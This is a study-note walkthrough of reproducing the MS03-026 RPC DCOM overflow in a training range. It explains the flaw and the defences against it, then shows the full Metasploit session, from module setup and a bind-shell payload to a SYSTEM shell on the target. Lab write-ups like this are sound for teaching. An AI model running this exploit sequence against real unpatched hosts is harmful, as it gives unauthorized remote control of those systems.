[Beginner's Study Notes] Vulnerability Reproduction and Verification: MS03-026

Environment

  • Target: Hongri range, ATT&CK Red Team Evaluation 01 - win2k3, 192.168.52.141
  • Attacker: 32-bit Kali, 172.24.4.7
  • Traffic forwarding into the internal network has already been set up (Kali and the target sit on different subnets, so every connection below, in both directions, depends on that forwarding)

MS03-026 reproduction procedure

Vulnerability overview

MS03-026 (CVE-2003-0352) is a remotely exploitable buffer overflow affecting several versions of Microsoft Windows (NT 4.0, 2000, XP and Server 2003). The flaw is in the RPC service (RPCSS), specifically in its implementation of the Distributed Component Object Model (DCOM) interface, and it lets an attacker run code of their choosing on the target host.

The root cause is in how the RPC service handles messages exchanged over TCP/IP. The DCOM interface processes object activation requests that client machines send to the server; one field of such a request, the server name inside a UNC path, is copied into a fixed-size stack buffer without a length check. A remote attacker who sends a specially crafted RPC DCOM activation request overflows that buffer and executes arbitrary instructions with Local System privileges, with no authentication required. The service listens on TCP port 135 (it is also reachable over TCP 139, 445 and 593 and over UDP), which is why the Metasploit module below targets RPORT 135.

A series of worms, most famously Blaster (August 2003) and Welchia, exploited this flaw in the wild. The defence is to disconnect an exposed host from the network, apply the MS03-026 patch (later superseded by MS03-039, which fixed further RPCSS flaws), and only then reconnect it; block the RPC ports above at the perimeter; and, where a site can tolerate it, disable DCOM entirely.

In short, MS03-026 is a critical vulnerability that gives an unauthenticated remote attacker SYSTEM-level code execution. Protecting a system requires timely patching plus the other measures above, such as disabling DCOM.

Run: msfconsole

┌──(kali㉿kali)-[~]
└─$ msfconsole 
Metasploit tip: View missing module options with show missing
                                                  
                                   ____________
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $a,        |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $S`?a,     |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%__%%%%%%%%%%|       `?a, |%%%%%%%%__%%%%%%%%%__%%__ %%%%]
 [% .--------..-----.|  |_ .---.-.|       .,a$%|.-----.|  |.-----.|__||  |_ %%]
 [% |        ||  -__||   _||  _  ||  ,,aS$""`  ||  _  ||  ||  _  ||  ||   _|%%]
 [% |__|__|__||_____||____||___._||%$P"`       ||   __||__||_____||__||____|%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| `"a,       ||__|%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%|____`"a,$$__|%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%        `"$   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]


       =[ metasploit v6.4.9-dev                           ]
+ -- --=[ 2420 exploits - 1248 auxiliary - 423 post       ]
+ -- --=[ 1468 payloads - 47 encoders - 11 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit Documentation: https://docs.metasploit.com/

Run: search ms03-026

msf6 > search ms03-026

Matching Modules
================

   #  Name                                  Disclosure Date  Rank   Check  Description
   -  ----                                  ---------------  ----   -----  -----------
   0  exploit/windows/dcerpc/ms03_026_dcom  2003-07-16       great  Yes    MS03-026 Microsoft RPC DCOM Interface Overflow


Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/dcerpc/ms03_026_dcom

Run: use 0 or use exploit/windows/dcerpc/ms03_026_dcom

msf6 > use 0
[*] Using configured payload windows/shell/reverse_tcp
msf6 exploit(windows/dcerpc/ms03_026_dcom) > 

Run: set rhost 192.168.52.141

msf6 exploit(windows/dcerpc/ms03_026_dcom) > set rhost 192.168.52.141
rhost => 192.168.52.141

Run: set lhost 172.24.4.7

msf6 exploit(windows/dcerpc/ms03_026_dcom) > set lhost 172.24.4.7
lhost => 172.24.4.7

Run: set payload generic/shell_bind_tcp

A bind payload listens on the target itself (LPORT 4444) and the attacker connects to it, so the LHOST set above is not used by this payload; that is why it disappears from show options, and why the session line later shows Kali (172.24.4.7) connecting to 192.168.52.141:4444 rather than the target calling back. The trade-off is that the attacker must be able to reach the target's bind port through the forwarding, and that port is equally visible to anyone else who can reach the host.

msf6 exploit(windows/dcerpc/ms03_026_dcom) > set payload generic/shell_bind_tcp
payload => generic/shell_bind_tcp

Run: show options

msf6 exploit(windows/dcerpc/ms03_026_dcom) > show options 

Module options (exploit/windows/dcerpc/ms03_026_dcom):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  192.168.52.141   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/
                                      using-metasploit.html
   RPORT   135              yes       The target port (TCP)


Payload options (generic/shell_bind_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  4444             yes       The listen port
   RHOST  192.168.52.141   no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Windows NT SP3-6a/2000/XP/2003 Universal



View the full module info with the info, or info -d command.

Run: exploit or run (the search result lists Check: Yes, so check can be run first to confirm the target before the overflow is sent)

msf6 exploit(windows/dcerpc/ms03_026_dcom) > exploit 

[*] 192.168.52.141:135 - Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] 192.168.52.141:135 - Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.52.141[135] ...
[*] 192.168.52.141:135 - Calling DCOM RPC with payload (1648 bytes) ...
[*] Started bind TCP handler against 192.168.52.141:4444
[*] Command shell session 1 opened (172.24.4.7:34395 -> 192.168.52.141:4444) at 2024-06-09 12:23:25 -0400


Shell Banner:
Microsoft Windows [Version 5.2.3790]
-----
          

C:\WINDOWS\system32>ipconfig                            
ipconfig

Windows IP Configuration


Ethernet adapter Local Area Connection:

   Connection-specific DNS Suffix  . : 
   IP Address. . . . . . . . . . . . : 192.168.52.141
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.52.2

Shell obtained. Note that with generic/shell_bind_tcp this is a bind shell rather than a reverse shell: the session line shows Kali (172.24.4.7) connecting to the target on port 4444, not the target connecting back.
PS: for study only; corrections from more experienced readers are welcome.

Make sure you are authorized before using these techniques and that your actions comply with the law and with ethical guidelines. This information is provided for educational and research purposes only.
